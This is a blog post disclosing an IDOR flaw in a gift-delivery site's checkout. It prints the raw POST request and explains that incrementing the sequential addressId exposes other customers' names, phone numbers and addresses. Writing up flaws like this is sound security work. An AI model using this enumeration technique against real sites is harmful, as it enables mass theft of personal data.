# Buying A Gift Can Cost You Your PII Data Almost 1 year ago I reported one **PII Data leak** to [Winni Bug Bounty Program.](https://www.winni.in/bug-bounty) [![](https://cdn.hashnode.com/res/hashnode/image/upload/v1656363287589/UYkRp1uxa.png)](https://1.bp.blogspot.com/-OdfveK88MKE/Xta3mTfY9WI/AAAAAAAAVus/KSGY9iRZxdoK4ONy58gg2WJ5qbM3MEN1ACLcBGAsYHQ/s1600/Screenshot_195.png) After 20+ follow up mail I am disclosing  the issue though [Winni](https://www.winni.in/)  team fixed the issue silently without responding back. [![](https://cdn.hashnode.com/res/hashnode/image/upload/v1656363289777/2RS5LbXpZ.jpeg)](https://aniportalimages.s3.amazonaws.com/media/details/Winni_Logo_Square_rwUpPrm.jpg) So the issue is a pretty straight forward  [IDOR](https://portswigger.net/web-security/access-control/idor)   Winni delivers cake and gift to your loved one , while placing the order before payment its ask for the address. While selecting the address one POST request made to fetch the address in reference to  addressId. ```http POST /checkout/adv/address/select-previous HTTP/1.1 Host: winni.in User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 16 Origin: winni.in Connection: close Referer: winni.in/checkout/adv/address Cookie: AWSALBTG=XXX addressId=685945 ``` Alter the addressid value to fetch other user's address along with name and phone number. As the addressId is sequential an attacker can fetch all address available in the database . Which will result mass PII leaks including data such as names, phone numbers and addresses. **POC** PS- Don't waste your time by reporting their bug bounty program.  Thanks for reading, any suggestion feedback are welcome